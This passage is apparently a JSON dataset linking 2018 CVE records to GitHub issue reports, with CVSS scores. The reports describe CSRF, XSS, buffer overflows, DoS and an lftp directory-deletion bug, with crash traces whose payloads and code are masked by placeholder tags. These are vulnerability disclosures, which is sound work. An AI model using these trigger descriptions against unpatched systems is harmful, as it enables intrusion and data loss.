        "description": "There is a CSRF vulnerability that can delete the users' articles. When the users login in, open the following one page. POC: APITAG delete users' articles ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10771",
        "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/17",
        "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/17",
        "Repo_new": "lewdlime/abcm2ps",
        "Issue_Created_At": "2018-04-13T13:36:30Z",
        "description": "stack buffer overflow APITAG in get_key(struct SYMBOL s). URLTAG (gdb) set args POC2 (gdb) r Starting program: PATHTAG POC2 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG abcm2ps NUMBERTAG File POC2 POC NUMBERTAG error: Bad character NUMBERTAG POC NUMBERTAG error: Bad character NUMBERTAG stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG be NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG fe7ea in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG f NUMBERTAG in get_key (s=s APITAG at APITAG NUMBERTAG c8 in get_info (s=s APITAG at APITAG NUMBERTAG in do_tune () at APITAG NUMBERTAG in abc_eof () at APITAG NUMBERTAG e NUMBERTAG e9 in frontend (s=<optimized out>, s APITAG PATHTAG (C&C NUMBERTAG ZV PATHTAG ftype=ftype APITAG fname=fname APITAG \"POC2\", linenum NUMBERTAG linenum APITAG at APITAG NUMBERTAG b NUMBERTAG d in treat_file (fn=<optimized out>, ext=<optimized out>) at APITAG NUMBERTAG f9 in main (argc NUMBERTAG argv=<optimized out>) at APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10790",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/390",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/390",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-04-26T13:44:32Z",
        "description": "Integer overflow at PATHTAG and buffer overflow at PATHTAG cmd: APITAG poc can download here URLTAG version: master head vuln type: integer and buffer overflow There is an integer overflow at APITAG , which then causes an buffer overflow read bugs at APITAG . ERRORTAG The following is the debug process. Integer overflow: ERRORTAG Buffer overflow crash ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10804",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1053",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1053",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-24T16:33:01Z",
        "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10805",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1054",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1054",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-24T16:33:23Z",
        "description": "Memory leak in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10806",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/10",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/10",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-05-07T02:55:10Z",
        "description": "Frog CMS NUMBERTAG has a reflected Cross Site Scripting Vulnerability. I have found a reflected Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG In the document management office, create new directory test1: Files >test1 APITAG APITAG Modify the directory test1 name\uff0cadding a payload at the directory causes directory errors to trigger cross site scripting\u3002 i think you can see the following picture to konw more. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10821",
        "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/384",
        "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/384",
        "Repo_new": "blackcatdevelopment/blackcatcms",
        "Issue_Created_At": "2018-05-05T18:16:01Z",
        "description": "Cross Site Scripting APITAG XSS) Vulnerability in blackcatcms NUMBERTAG Hi, I found a Cross site Scripting APITAG XSS) in blackcatcms NUMBERTAG Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user\u2019s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Reflected XSS Attacks Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user\u2019s browser. The browser then executes the code because it came from a \"trusted\" server. Reflected XSS is also sometimes referred to as Non Persistent or Type II XSS. Vulnerability Name: Cross Site Scripting APITAG XSS) Vulnerable URL: URLTAG Steps to Reproduce: Step NUMBERTAG Logged In as a Admin Role Step NUMBERTAG On Search panel with APITAG \"> APITAG Step NUMBERTAG It will store the search content as javascript code and it will execute cross site scripting. Vulnerable field is search panel. FILETAG Additional information >blackcatcms NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG >HTTP server type and version: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10827",
        "Issue_Url_old": "https://github.com/litecart/litecart/issues/119",
        "Issue_Url_new": "https://github.com/litecart/litecart/issues/119",
        "Repo_new": "litecart/litecart",
        "Issue_Created_At": "2018-05-06T21:09:47Z",
        "description": "DOS Vulnerability through APITAG Hi, I found a DOS Vulnerability in litecart. If an attacker sends random URL's to APITAG those URLs (if unique) are saved to the file APITAG Unfortunatly this file is fully loaded to RAM if a not existing URL is called. By sending a large number of invalid request to litecart, the file size can be increased infinite. Then every call to litecart, that has an invalid url takes the full available memory and causes a lot of IO. Recommendations The entries should be logged to dababase. An upsert command can be used to create or update the entries in the db. How can you protect your system, until a bugfix is published? E.g. create a cron that empties the not_found.log file. Best Regards mschop",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10916",
        "Issue_Url_old": "https://github.com/lavv17/lftp/issues/452",
        "Issue_Url_new": "https://github.com/lavv17/lftp/issues/452",
        "Repo_new": "lavv17/lftp",
        "Issue_Created_At": "2018-05-16T14:09:53Z",
        "description": "Exploit in reverse mirror job deletes cwd on source. Warning: This will delete local content on the server you are running the commands from NUMBERTAG Create a directory called APITAG on any FTP server NUMBERTAG Run an lftp reverse mirror command with APITAG towards this server, where APITAG does not exist on the local source NUMBERTAG Watch as lftp deletes the cwd on the sourceserver. If you run the lftp command in APITAG as root , that means the entire server will be wiped. Script to reproduce: ERRORTAG From log: CODETAG Clearly arguments passed to APITAG are not escaped correctly, leaving it open to injection LFTP NUMBERTAG Libraries used: Expat NUMBERTAG APITAG NUMBERTAG idn NUMBERTAG Readline NUMBERTAG zlib NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10921",
        "Issue_Url_old": "https://github.com/hisdeedsaredust/ttembed/issues/3",
        "Issue_Url_new": "https://github.com/hisdeedsaredust/ttembed/issues/3",
        "Repo_new": "hisdeedsaredust/ttembed",
        "Issue_Created_At": "2018-08-02T15:39:23Z",
        "description": "CVETAG Failure to Check File Bounds May Lead to Input File Corruption. Certain input files may trigger an integer overflow in ttembed input file processing. This overflow could potentially lead to corruption of the input file due to a lack of checking return codes of fgetc/fputc function calls. ttembed fails to check the return of fgetc for failures which can lead to output file corruption. Note the following: ERRORTAG readbe NUMBERTAG should be checking for EOF. The application fails to verify that reads will succeed via ensuring minimum file lengths. Instead, it blindly reads and fails to check that EOF is not returned. As such, large negative values are returned by readbe NUMBERTAG One obvious case occurs on line NUMBERTAG where fstype is set to the output of readbe NUMBERTAG If no more bytes can be read from the file handle, readbe NUMBERTAG will return NUMBERTAG A fseek on line NUMBERTAG adds NUMBERTAG to NUMBERTAG which wraps around to an fseek of NUMBERTAG which is valid. This later leads to incorrect writes and \"corruption\" of the input file. All usages of fgetc should be checked else file bounds should be verified before fseeks/fgetcs are called. The security implications of this seem rather unimportant as an attacker submitted a corrupted file and the server further corrupting it seems rather obtuse, but perhaps some consumer downstream of ttembed may rely on correct files being output. Nevertheless, ttembed should still terminate early in this case before writing. Reproducer attached. Copy modify.ttf to APITAG run ttembed on APITAG then diff the file and the bak. They will be different. FILETAG This has been assigned CVETAG Thank you!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10922",
        "Issue_Url_old": "https://github.com/hisdeedsaredust/ttembed/issues/2",
        "Issue_Url_new": "https://github.com/hisdeedsaredust/ttembed/issues/2",
        "Repo_new": "hisdeedsaredust/ttembed",
        "Issue_Created_At": "2018-08-02T15:19:54Z",
        "description": "CVETAG : Use of Untrusted Length Field May Lead to Denial of Service. Hi, If a large length NUMBERTAG fffffff) is parsed by ttembed, the following loop will run for quite a long time causing a denial of service: APITAG As readbe NUMBERTAG calls fgetc four times, this results in roughly NUMBERTAG calls to fgetc. On my computer, it takes ttembed around NUMBERTAG minutes to finish looping. APITAG Instead of looping forever, the code should fail as soon as readbe NUMBERTAG detects an EOF, else, the program should verify the bounds of the program and bail out when size > actual size of the file. This has been assigned CVETAG . Reproducer attached. FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10958",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/302",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/302",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-05-09T13:38:53Z",
        "description": "SIGABRT in types.cpp APITAG function. APITAG registers ]\u2500\u2500\u2500\u2500 $ra NUMBERTAG rb NUMBERTAG fffffffd NUMBERTAG rc NUMBERTAG ec0fed NUMBERTAG e NUMBERTAG rd NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffd NUMBERTAG rbp NUMBERTAG ffffffea $rsi NUMBERTAG ffffffea $rdi NUMBERTAG rip NUMBERTAG c7 \u2192 APITAG mov rdi, rbp $r NUMBERTAG ffffffffffffe NUMBERTAG r NUMBERTAG ffffffffffffe NUMBERTAG r NUMBERTAG ffffffffffffe2f0 $r NUMBERTAG a $r NUMBERTAG ec NUMBERTAG b NUMBERTAG bcaea NUMBERTAG r NUMBERTAG c $r NUMBERTAG r NUMBERTAG eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $es NUMBERTAG gs NUMBERTAG ds NUMBERTAG ss NUMBERTAG b $fs NUMBERTAG cs NUMBERTAG APITAG stack NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffff NUMBERTAG fffffffd NUMBERTAG APITAG mov rdi, QWORD PTR [rb NUMBERTAG fffffffd NUMBERTAG ffffffea NUMBERTAG fffffffd NUMBERTAG a NUMBERTAG c0e3e1fcb NUMBERTAG fffffffd NUMBERTAG ec0fd NUMBERTAG e6d6f NUMBERTAG a4c4d NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG APITAG code:i NUMBERTAG b0 APITAG lea rsp, [rsp NUMBERTAG b8 APITAG mov QWORD PTR [rb NUMBERTAG bf APITAG mov QWORD PTR [rb NUMBERTAG c7 APITAG mov rdi, rbp NUMBERTAG ca APITAG call NUMBERTAG ac0 APITAG NUMBERTAG cf APITAG mov QWORD PTR [rb NUMBERTAG rbp NUMBERTAG d3 APITAG mov QWORD PTR [rbx], ra NUMBERTAG d6 APITAG add rsp NUMBERTAG da APITAG pop rbx APITAG APITAG NUMBERTAG if (size > size NUMBERTAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG size NUMBERTAG size NUMBERTAG ffffffea NUMBERTAG APITAG = new byte[size NUMBERTAG size_ = size NUMBERTAG std::pair<byte , long> APITAG APITAG threads NUMBERTAG Id NUMBERTAG Name: \"exi NUMBERTAG stopped, reason: SINGLE STEP APITAG trace NUMBERTAG c7 \u2192 Name: APITAG size NUMBERTAG ffffffea NUMBERTAG Name: APITAG \"\", APITAG arr= APITAG NUMBERTAG Name: APITAG MENTIONTAG keysize NUMBERTAG c, APITAG NUMBERTAG fe \u2192 Name: APITAG data= MENTIONTAG APITAG NUMBERTAG Name: APITAG NUMBERTAG Name: APITAG NUMBERTAG d NUMBERTAG Name: APITAG APITAG NUMBERTAG d \u2192 Name: main(argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG fffbe NUMBERTAG Name: APITAG <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdf NUMBERTAG c9 \u2192 Name: APITAG APITAG gef\u27a4 terminate called after throwing an instance of 'std::bad_alloc' APITAG std::bad_alloc Program received signal SIGABRT, Aborted. I find this when I set \u2018ulimit NUMBERTAG G)\u2019. [ URLTAG url",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10971",
        "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/501",
        "Issue_Url_new": "https://github.com/flif-hub/flif/issues/501",
        "Repo_new": "flif-hub/flif",
        "Issue_Created_At": "2018-05-08T03:43:44Z",
        "description": "BUG Program received signal SIGSEGV, Segmentation fault. I used the AFL tool to find the bug of the APITAG method, The following is which is the gdb stack FILETAG Then the following is gdb's instructions and registers (gdb) x/i $pc NUMBERTAG ac NUMBERTAG a <image_load_pnm(char const , Image NUMBERTAG mov (%rdi),%r NUMBERTAG gdb) i r ra NUMBERTAG ffffffff NUMBERTAG rb NUMBERTAG ffffffff NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffdd NUMBERTAG fffffffdd NUMBERTAG r NUMBERTAG ffff7fca NUMBERTAG r NUMBERTAG f6c6c NUMBERTAG r NUMBERTAG fffffffdb NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffdfb NUMBERTAG r NUMBERTAG fffffe NUMBERTAG rip NUMBERTAG ac NUMBERTAG a NUMBERTAG ac NUMBERTAG a <image_load_pnm(char const , Image NUMBERTAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10972",
        "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/503",
        "Issue_Url_new": "https://github.com/flif-hub/flif/issues/503",
        "Repo_new": "flif-hub/flif",
        "Issue_Created_At": "2018-05-08T08:02:04Z",
        "description": "ERROR Segmentation fault APITAG The third Error is also Segmentation fault .I also use AFL tools The error is : Starting program: PATHTAG e PATHTAG APITAG overwrite Warning: expected \".png\", \".pnm\" or \".pam\" file name extension for input file, trying anyway... Program received signal SIGSEGV, Segmentation fault. APITAG (this=<optimized out>, APITAG rac=...) at APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1098",
        "Issue_Url_old": "https://github.com/coreos/etcd/issues/9353",
        "Issue_Url_new": "https://github.com/etcd-io/etcd/issues/9353",
        "Repo_new": "etcd-io/etcd",
        "Issue_Created_At": "2018-02-25T11:50:25Z",
        "description": "Mitigate CSRF and DNS Rebinding attacks. After explaining the issue in private with the security mailing list, we determined it is low enough in severity to make it a public discussion. This issue is relevant only to etcd deployment on local networks with no authentication scheme set up. It may not be a common scenario but it affects anyone who work with etcd locally or on a local network and use it without authentication, which is the default. For the sake of demonstration, I'm using a scenario where etcd is deployed on localhost. This can be any LAN address though (the attacker would have to know the address as a perquisite, but localhost is pretty common). The first issue is with CSRF URLTAG . An attacker can set up a website that tries to send a POST request to the etcd server and modify a key. Adding a key is done with PUT so it is theoretically safe (can't PUT from an HTML form or such) but POST allows creating in order keys that an attacker can send. Example APITAG CODETAG The second issue is with DNS rebinding URLTAG . It essentially means an attacker can control his DNS records to direct to localhost, and trick the browser into sending requests to localhost (or any other address). There are many resources on how this attack works. I've set up a live APITAG at FILETAG (based on taviso's work CVETAG . If the issue is unclear though please let me know and I will explain the attack in further details. Success example: FILETAG Whitelisting hostnames is a possible simple solution. See taviso's comment CVETAG on this or the fix URLTAG he sent to Transmission.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10998",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/303",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/303",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-05-10T01:16:20Z",
        "description": "SIGABRT in src/jp2image.cpp Safe::add. RA NUMBERTAG RB NUMBERTAG ec0d NUMBERTAG APITAG in addition\") RC NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG RD NUMBERTAG RSI NUMBERTAG RDI NUMBERTAG RBP NUMBERTAG e NUMBERTAG c NUMBERTAG ffff6ccb NUMBERTAG fbad NUMBERTAG RSP NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a ( APITAG : mov rdx,QWORD PTR fs NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG R NUMBERTAG ffff6ccc NUMBERTAG R NUMBERTAG ffff7fd NUMBERTAG ffff7fd NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG ec0aa NUMBERTAG R NUMBERTAG ba NUMBERTAG b NUMBERTAG e0 APITAG lea rsp, rsp NUMBERTAG R NUMBERTAG fffffffd NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG : mov ea NUMBERTAG ea NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : movsxd rdi,ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : syscall NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG : ja NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : repz ret NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : nop WORD PTR [rax+ra NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : test ecx,ecx [ stack NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a ( APITAG : mov rdx,QWORD PTR fs NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcfa NUMBERTAG fffffffcfa NUMBERTAG fffffffcfb NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGABRT NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. [ Legend: Modified register | Code | Heap | Stack | String ] APITAG registers ]\u2500\u2500\u2500\u2500 $ra NUMBERTAG rb NUMBERTAG ec0d NUMBERTAG APITAG in addition\" $rc NUMBERTAG ffff NUMBERTAG b NUMBERTAG fffff NUMBERTAG d NUMBERTAG H=\"?) $rd NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 APITAG mov rdx, QWORD PTR fs NUMBERTAG rbp NUMBERTAG e NUMBERTAG c NUMBERTAG ffff6ccb NUMBERTAG fbad NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rip NUMBERTAG ffff NUMBERTAG b NUMBERTAG fffff NUMBERTAG d NUMBERTAG H=\"?) $r NUMBERTAG ffff6ccc NUMBERTAG r NUMBERTAG ffff7fd NUMBERTAG ffff7fd NUMBERTAG loop detected] $r NUMBERTAG r NUMBERTAG r NUMBERTAG ec0aa NUMBERTAG r NUMBERTAG ba NUMBERTAG b NUMBERTAG e0 \u2192 APITAG lea rsp, [rsp NUMBERTAG r NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG eflags: [carry parity adjust zero sign trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $gs NUMBERTAG fs NUMBERTAG ss NUMBERTAG b $ds NUMBERTAG es NUMBERTAG cs NUMBERTAG APITAG stack NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 APITAG mov rdx, QWORD PTR fs NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcfa NUMBERTAG fffffffcfa NUMBERTAG fffffffcfb NUMBERTAG APITAG code:i NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG mov ea NUMBERTAG ea NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG movsxd rdi, ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG syscall NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG cmp ra NUMBERTAG fffffffffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG ja NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG repz ret NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG nop WORD PTR [rax+ra NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG test ecx, ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG a APITAG jg NUMBERTAG ffff NUMBERTAG b NUMBERTAG b APITAG APITAG threads NUMBERTAG Id NUMBERTAG Name: \"exi NUMBERTAG stopped, reason: SIGABRT APITAG trace NUMBERTAG ffff NUMBERTAG b NUMBERTAG Name: __GI_raise(sig NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 Name: APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG d \u2192 Name: APITAG NUMBERTAG ffff NUMBERTAG c6b6 \u2192 call NUMBERTAG ffff NUMBERTAG fc0 APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG Name: APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG Name: APITAG NUMBERTAG c6a \u2192 Name: Safe::add<unsigned int>(summand NUMBERTAG summand NUMBERTAG optimized out NUMBERTAG c6a \u2192 Name: APITAG out NUMBERTAG ab NUMBERTAG Name: APITAG NUMBERTAG fa0 \u2192 Name: APITAG PATHTAG ) command: exi NUMBERTAG et [poc] [ URLTAG url",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10999",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/306",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/306",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-05-10T09:43:16Z",
        "description": "heap buffer overflow on APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG f NUMBERTAG at pc NUMBERTAG fa NUMBERTAG d NUMBERTAG b NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG ERRORTAG NUMBERTAG b0 sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG f NUMBERTAG thread T NUMBERTAG fa NUMBERTAG d NUMBERTAG b NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG fa NUMBERTAG d3ce8bf in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG d3ced0a in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG d3cb NUMBERTAG in APITAG ( PATHTAG NUMBERTAG in APITAG const ( PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG dbd in main ( PATHTAG NUMBERTAG fa NUMBERTAG c8f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG a NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fa NUMBERTAG d7a NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG fa NUMBERTAG d3cae NUMBERTAG in APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffbe NUMBERTAG c NUMBERTAG fffbea NUMBERTAG c NUMBERTAG fffbeb NUMBERTAG c NUMBERTAG fffbec NUMBERTAG c NUMBERTAG fffbed NUMBERTAG c NUMBERTAG fffbee NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa 